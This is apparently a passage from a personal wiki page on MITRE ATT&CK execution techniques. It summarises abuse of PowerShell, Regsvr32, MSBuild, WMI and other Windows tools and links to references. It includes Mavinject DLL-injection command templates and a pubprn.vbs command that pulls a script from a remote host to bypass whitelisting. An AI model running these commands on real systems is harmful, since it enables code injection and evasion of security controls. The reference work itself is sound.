<li>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.TechNet PowerShell Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.</li>
<li>PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.</li>
<li>Administrator permissions are required to use PowerShell to connect to remote systems.</li>
<li>A number of PowerShell-based offensive testing tools are available, including Empire,Github PowerShell Empire PowerSploit,Powersploit and PSAttack.Github PSAttack</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-5.1" class="external">PowerShell - ms docs</a>
</li>
<li>
<a href="https://en.wikipedia.org/wiki/PowerShell" class="external">Powershell - Wikipedia</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/powershell/mt173057.aspx" class="external">Microsoft Powershell - msdn</a>
</li>
</ul>
<hr />
<h2 id="page_Regsvcs%2FRegasm">Regsvcs/Regasm</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1121" class="external">Regsvcs/Regasm - ATT&amp;CK</a>
<ul>
<li>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.MSDN RegsvcsMSDN Regasm Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.SubTee GitHub All The Things Application Whitelisting Bypass</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool" class="external">Regsvcs.exe (.NET Services Installation Tool) - msdn</a>
</li>
<li>
<a href="https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool" class="external">Regasm.exe (Assembly Registration Tool) - msdn</a>
</li>
</ul>
<hr />
<h2 id="page_Regsvr32">Regsvr32</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1117" class="external">Regsvr32 - ATT&amp;CK</a>
<ul>
<li>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.Microsoft Regsvr32</li>
<li>Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.</li>
<li>Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed.SubTee Regsvr32 Whitelisting Bypass This variation of the technique has been used in campaigns targeting governments.FireEye Regsvr32 Targeting Mongolian Gov</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages" class="external">How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages</a>
</li>
<li>
<a href="https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/" class="external">How to Evade Application Whitelisting Using REGSVR32 - BHIS</a>
</li>
<li>
<a href="http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html" class="external">Bypass Application Whitelisting Script Protections - Regsvr32.exe &amp; COM Scriptlets (.sct files) - subTee</a>
</li>
<li>
<a href="http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html" class="external">Practical use of JavaScript and COM Scriptlets for Penetration Testing</a>
</li>
</ul>
<hr />
<h2 id="page_Rundll32">Rundll32</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1085" class="external">Rundll32 - ATT&amp;CK</a>
<ul>
<li>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://technet.microsoft.com/en-us/library/ee649171(v=ws.11).aspx" class="external">Rundll32 - technet</a>
</li>
<li>
<a href="https://pentestlab.blog/tag/rundll32/" class="external">AppLocker Bypass – Rundll32 - pentesterlab</a>
</li>
</ul>
<hr />
<h2 id="page_Scheduled+Tasks">Scheduled Tasks</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1053" class="external">Scheduled Tasks - ATT&amp;CK</a>
<ul>
<li>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.TechNet Task Scheduler Security An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<h4 id="page_OS+X">OS X</h4>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://technet.microsoft.com/en-us/library/cc748993(v=ws.11).aspx" class="external">Schedule a Task - MSDN</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx" class="external">Schtasks.exe - MSDN</a>
<ul>
<li>Enables an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer. Running Schtasks.exe without arguments displays the status and next run time for each registered task.</li>
</ul>
</li>
<li>
<a href="https://technet.microsoft.com/en-us/library/bb490866.aspx" class="external">At - MSDN</a>
<ul>
<li>Schedules commands and programs to run on a computer at a specified time and date. You can use at only when the Schedule service is running. Used without parameters, at lists scheduled commands.</li>
</ul>
</li>
<li>
<a href="https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks" class="external">How To Use the AT Command to Schedule Tasks - MS</a>
</li>
</ul>
<hr />
<h2 id="page_Scripting">Scripting</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1064" class="external">Scripting - ATT&amp;CK</a>
<ul>
<li>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. MetasploitMetasploit, VeilVeil, and PowerSploitPowersploit are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.Alperovitch 2014</li>
</ul>
</li>
</ul>
<h4 id="page_OS+X">OS X</h4>
<ul>
<li>
<a href="https://developer.apple.com/library/content/documentation/OpenSource/Conceptual/ShellScripting/shell_scripts/shell_scripts.html" class="external">Shell Script Basics - developer.apple</a>
</li>
</ul>
<hr />
<h2 id="page_Service+Execution">Service Execution</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1035" class="external">Service Execution - ATT&amp;CK</a>
<ul>
<li>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<h4 id="page_OS+X">OS X</h4>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="http://windowsitpro.com/windows/netexe-reference" class="external">Net.exe reference.</a>
</li>
<li>
<a href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec" class="external">PSExec</a>
</li>
<li>
<a href="https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" class="external">xCmd an Alternative to PsExec</a>
</li>
</ul>
<hr />
<h2 id="page_Signed+Binary+Proxy+Execution">Signed Binary Proxy Execution</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1218" class="external">Signed Binary Proxy Execution - ATT&amp;CK</a>
<ul>
<li>Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.</li>
<li>
<strong>Mavinject.exe</strong>
<ul>
<li>Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process.1
<ul>
<li>
<code>&quot;C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe&quot; &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
</li>
<li>
<code>C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</code>
</li>
</ul>
</li>
</ul>
</li>
<li>
<strong>SyncAppvPublishingServer.exe</strong>
<ul>
<li>SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe.</li>
<li>Several others binaries exist that may be used to perform similar behavior.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Signed+Binary+Proxy+Execution">Signed Binary Proxy Execution</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1216" class="external">Signed Script Proxy Execution - ATT&amp;CK</a>
<ul>
<li>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.</li>
<li>PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.
<ul>
<li>Example command: <code>cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>
</li>
<li>There are several other signed scripts that may be used in a similar manner.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Source">Source</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1153" class="external">Source - ATT&amp;CK</a>
<ul>
<li>The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways <code>source /path/to/filename [arguments]</code> or . <code>/path/to/filename [arguments]</code>. Take note of the space after the &quot;.&quot;. Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<ul>
<li>
<a href="http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/x237.html" class="external">Sourcing a File - tldp</a>
</li>
<li>
<a href="https://bash.cyberciti.biz/guide/Source_command" class="external">Source command - bash.cyberciti</a>
</li>
</ul>
<hr />
<h2 id="page_Spaces+after+Filename">Spaces after Filename</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1151" class="external">Spaces after Filename - ATT&amp;CK</a>
<ul>
<li>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &quot;evil.txt &quot; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Third-Party+Software">Third-Party Software</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1072" class="external">Third-Party Software - ATT&amp;CK</a>
<ul>
<li>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.</li>
<li>Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</li>
<li>The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Trap">Trap</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1154" class="external">Trap - ATT&amp;CK</a>
<ul>
<li>The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap</code> 'command list' signals where &quot;command list&quot; will be executed when &quot;signals&quot; are received.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<ul>
<li>
<a href="http://tldp.org/LDP/Bash-Beginners-Guide/html/sect_12_02.html" class="external">Traps - tldp</a>
</li>
<li>
<a href="https://www.shellscript.sh/trap.html" class="external">Shell Scripting Tutorial - Trap</a>
</li>
<li>
<a href="https://www.tutorialspoint.com/unix/unix-signals-traps.htm" class="external">Unix / Linux - Signals and Traps - TutorialsPoint</a>
</li>
</ul>
<hr />
<h2 id="page_Trusted+Developer+Utilites">Trusted Developer Utilites</h2>
<p>Trusted Developer Utilities</p>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1127" class="external">Trusted Developer Utilities -* ATT&amp;CK</a>
<ul>
<li>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.</li>
</ul>
</li>
</ul>
<h3 id="page_MSBuild">MSBuild</h3>
<ul>
<li>MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.MSDN MSBuild</li>
<li>Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.MSDN MSBuild Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.SubTee GitHub All The Things Application Whitelisting Bypass
<ul>
<li>
<a href="https://msdn.microsoft.com/library/dd393574.aspx" class="external">MSBuild - MSDN</a>
</li>
<li>
<a href="https://msdn.microsoft.com/library/dd722601.aspx" class="external">MSBuild Inline Tasks - msdn</a>
</li>
<li>
<a href="https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks" class="external">MSBuild Inline Tasks - docs ms</a>
</li>
<li>
<a href="https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/" class="external">AppLocker Bypass – MSBuild - pentestlab</a>
</li>
</ul>
</li>
</ul>
<h3 id="page_DNX">DNX</h3>
<ul>
<li>The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.Microsoft Migrating from DNX DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.</li>
<li>An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.engima0x3 DNX Bypass
<ul>
<li>
<a href="https://docs.microsoft.com/en-us/dotnet/core/migration/from-dnx" class="external">Migrating from DNX to .NET Core CLI (project.json) - docs ms</a>
</li>
<li>
<a href="https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" class="external">Bypassing Application Whitelisting By Using dnx.exe - enigma0x3</a>
</li>
</ul>
</li>
</ul>
<h3 id="page_RCSI">RCSI</h3>
<ul>
<li>The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.Microsoft Roslyn CPT RCSI The rcsi.exe binary is signed by Microsoft.engima0x3 RCSI Bypass</li>
<li>C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.engima0x3 RCSI Bypass
<ul>
<li>
<a href="https://blogs.msdn.microsoft.com/visualstudio/2011/10/19/introducing-the-microsoft-roslyn-ctp/" class="external">Introducing the Microsoft “Roslyn” CTP</a>
</li>
<li>
<a href="https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/" class="external">Bypassing Application Whitelisting By Using rcsi.exe - enigma0x3</a>
</li>
</ul>
</li>
</ul>
<h3 id="page_WinDbg%2FCDB">WinDbg/CDB</h3>
<ul>
<li>WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.Microsoft Debugging Tools for Windows They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.</li>
<li>An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.Exploit Monday WinDbg</li>
<li>It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
<ul>
<li>
<a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/index" class="external">Debugging Tools for Windows (WinDbg, KD, CDB, NTSD) -docs ms</a>
</li>
<li>
<a href="http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" class="external">Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner - exploitmonday</a>
</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_User+Execution">User Execution</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1204" class="external">User Execution - ATT&amp;CK</a>
<ul>
<li>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Windows+Management+Instrumentation">Windows Management Instrumentation</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1047" class="external">Windows Management Instrumentation - ATT&amp;CK</a>
<ul>
<li>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)Wikipedia SMB and Remote Procedure Call Service (RPCS)TechNet RPC for remote access. RPCS operates over port 135.MSDN WMI An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.FireEye WMI 2015</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://msdn.microsoft.com/en-us/library/aa394582.aspx" class="external">Windows Management Instrumentation - msdn</a>
</li>
<li>
<a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" class="external">Windows Management  Instrumentation (WMI) Offense, Defense, and Forensics</a>
</li>
<li>
<a href="https://github.com/mattifestation/WMI_Backdoor" class="external">WMI_Backdoor</a>
<ul>
<li>A PoC WMI backdoor presented at Black Hat 2015</li>
</ul>
</li>
<li>
<a href="http://www.securitynewspaper.com/2015/10/10/abusing-windows-management-instrumentation-wmi-to-build-a-persistent-asynchronous-and-fileless-backdoor/" class="external">Abusing Windows Management Instrumentation (WMI) to Build a persistent, Asynchronous and Fileless Backdoor</a>
</li>
<li>
<a href="https://www.darkoperator.com/blog/2013/1/31/introduction-to-wmi-basics-with-powershell-part-1-what-it-is.html" class="external">Introduction to WMI Basics with PowerShell Part 1 (What it is and exploring it with a GUI)</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/library/aa389763(v=vs.85).aspx" class="external">Creating a WMI Script - msdn</a>
</li>
<li>
<a href="https://technet.microsoft.com/en-us/scriptcenter/dd742341.aspx" class="external">Learn About Scripting for Windows Management Instrumentation (WMI) - technet</a>
</li>
<li>
<a href="http://www.exploit-monday.com/2016/08/wmi-persistence-using-wmic.html" class="external">WMI Persistence using wmic.exe - exploit-monday</a>
</li>
<li>
<a href="https://gist.github.com/mattifestation/e55843eef6c263608206" class="external">WMI_persistence_template.ps1</a>
<ul>
<li>
<code>Fileless WMI persistence payload template (CommandlineEventConsumer, __IntervalTimerInstruction trigger, w/ registry payload storage)</code>
</li>
</ul>
</li>
<li>
<a href="http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html" class="external">Playing with MOF files on Windows, for fun &amp; profit</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/library/aa823192(VS.85).aspx" class="external">Managed Object Format (MOF)</a>
</li>
</ul>
<hr />
<h2 id="page_Windows+Remote+Management">Windows Remote Management</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1028" class="external">Windows Remote Management - ATT&amp;CK</a>
<ul>
<li>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).Microsoft WinRM It may be called with the winrm command or by any number of programs such as PowerShell.Jacobsen 2014</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://blogs.technet.microsoft.com/askperf/2010/09/24/an-introduction-to-winrm-basics/" class="external">An Introduction to WinRM Basics - technet</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/library/aa384426" class="external">Windows Remote Management - msdn</a>
</li>
<li>
<a href="http://hackingandsecurity.blogspot.com/2016/08/using-credentials-to-own-windows-boxes_99.html" class="external">Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM)</a>
</li>
</ul>
    </div>

        <nav>
        <ul class="Pager">
            <li class=Pager--prev><a href="../../ATT&CK-Stuff/ATT&CK/Discovery.html">Previous</a></li>            <li class=Pager--next><a href="../../ATT&CK-Stuff/ATT&CK/Exfiltration.html">Next</a></li>        </ul>
    </nav>
    </article>

            </div>
        </div>
    </div>
</div>

    
    <!-- jQuery -->
    <script src="../../themes/daux/js/jquery-1.11.3.min.js"></script>

    <!-- hightlight.js -->
    <script src="../../themes/daux/js/highlight.pack.js"></script>
    <script>hljs.initHighlightingOnLoad();</script>

    <!-- JS -->
    
    <script src="../../themes/daux/js/daux.js"></script>

            <!-- Tipue Search -->
        <script type="text/javascript" src="../../tipuesearch/tipuesearch.js"></script>

        <script>
            window.onunload = function(){}; // force $(document).ready to be called on back/forward navigation in firefox
            $(function() {
                tipuesearch({
                    'base_url': '../../'
                });
            });
        </script>
    
</body>
</html>
